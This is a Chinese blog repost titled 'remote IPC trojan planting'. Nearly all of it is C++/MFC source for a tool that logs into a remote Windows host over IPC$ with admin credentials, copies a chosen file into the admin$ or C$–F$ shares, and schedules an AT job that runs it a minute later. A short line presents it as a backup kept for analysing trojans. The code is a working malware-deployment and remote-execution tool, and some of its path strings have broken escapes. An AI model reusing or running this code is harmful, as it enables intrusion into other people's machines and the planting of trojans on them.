码迷,mamicode.com
首页 > 其他好文 > 详细

远程IPC种植木马

时间:2017-08-15 19:52:19      阅读:175      评论:0      收藏:0      [点我收藏+]

标签:sprint   sha   cmd   上传   comm   pcc   ted   amp   code   

要实现代码例如以下:

///////////////////////////////////////////////////////////////////////////////////// 
typedef struct TagHost 
{ 
CString host; 
CString user; 
CString pass; 
CString filename; 
CString LocalFilePath; 
CListBox* list; 
}IPC;
void CShareDlg::OnStart() //启动线程序 
{ 
  UpdateData(TRUE); 
  IPC* ipc = new IPC; 
  ipc->host = m_host; 
  ipc->user = m_user; 
  ipc->pass = m_pass; 
  ipc->LocalFilePath = m_localfile; 
  ipc->filename = filename; 
  ipc->list = &m_list; 
  AfxBeginThread(ThreadIpcConnect,ipc); 
}
/////////////////////////////线程/////////////////////////////////////////////////////
UINT ThreadIpcConnect(LPVOID lpvoid) 
{ 
  IPC* ipc; 
  CListBox* list;
  ipc = (IPC*)lpvoid; 
  CString host; 
  CString admin; 
  CString pass; 
  CString filename; 
  CString localfilepath;
  host = ipc->host ; 
  pass = ipc->pass; 
  admin = ipc->user; 
  localfilepath = ipc->LocalFilePath; 
  filename =ipc->filename ; 
list = ipc->list; 
  BOOL IpcConnect;
  LPTIME_OF_DAY_INFO TimeBuf=NULL; 
  NET_API_STATUS Status;
  CString RemoteFilePath,CmdCom("admin$\"); 
///////////////////////////////IPC连接//////////////////////////////////////////////////////////////// 
  NETRESOURCE ns; 
  TCHAR buf[MAX_PATH]; 
  wsprintf(buf,"\\%s\ipc$",host); 
  ZeroMemory(&ns,sizeof(ns)); 
  ns.dwScope=RESOURCE_GLOBALNET; 
  ns.dwType=RESOURCETYPE_ANY; 
  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC; 
  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE; 
  ns.lpLocalName=""; 
  ns.lpRemoteName=buf; 
  ns.lpProvider=NULL; 
  ns.lpComment=NULL; 
  CString hhost = host; 
  IpcConnect =WNetAddConnection2(&ns,pass,admin,0); 
///建立IPC连接 
  if(IpcConnect) 
  { 
//连接成功后 
///////////////////////////连接成功上传文件////////////////////////////////////////////////////////// 
    RemoteFilePath=("\\"+host+"\admin$\"+filename); 
    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
//拷贝文件到admin$(winnt) 假设复制失败,。向其它共享区复制 
      if(!IpcConnect) 
        { 
          RemoteFilePath=("\\"+host+"\C$\"+filename); 
          CmdCom="C:\"+filename; 
          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
            if(!IpcConnect) 
            { 
               RemoteFilePath=("\\"+host+"\D$\"+filename); 
               CmdCom="D:\"+filename; 
               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
           if(!IpcConnect) 
                  { 
                     RemoteFilePath=("\\"+host+"\E$\"+filename); 
                     CmdCom="E:\"+filename; 
                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); 
                     if(!IpcConnect) 
                       { 
                        RemoteFilePath ("\\"+host+"\F$\"+filename); 
                        CmdCom = "F:\"+filename; 
                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE); 
                       } 
                  } 
              } 
         } 
///////////////////////////得到远程主机时间/////////////////////////////////////////////////////////// 
         if(IpcConnect) 
         {//获取远程主机时间 
           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf); 
            if(Status==NERR_Success) 
            {//活取时间成功 
///////////////////////////启动目标文件/////////////////////////////////////////////////////////////// 
              DWORD day=1,JobTime; 
              AT_INFO ai; 
              day=day*2; 
              ai.Command=CmdCom.AllocSysString(); 
              ai.DaysOfMonth=day; 
              ai.DaysOfWeek=0; 
              ai.Flags=JOB_NONINTERACTIVE; 
              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000; 
              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime); 
              //启动上传的文件,一分钟后启动 
              if(Status==NERR_Success) 
              { 
                list->AddString(host+"启动成功"); 
              } 
              else 
                list->AddString(host+"启动失败"); 
              } 
          else 
            { 
             list->AddString(host+"获取时间失败"); 
            } 
         } 
         else 
         { 
          list->AddString(host+"拷贝文件失败"); 
         } 
    } 
    else 
    list->AddString(host+"连接失败"); 
return TRUE; 
}
 


代码来自于互联网而且这些代码不过为了备份。供分析木马病毒的时候使用

远程IPC种植木马

标签:sprint   sha   cmd   上传   comm   pcc   ted   amp   code   

原文地址:http://www.cnblogs.com/yfceshi/p/7366937.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!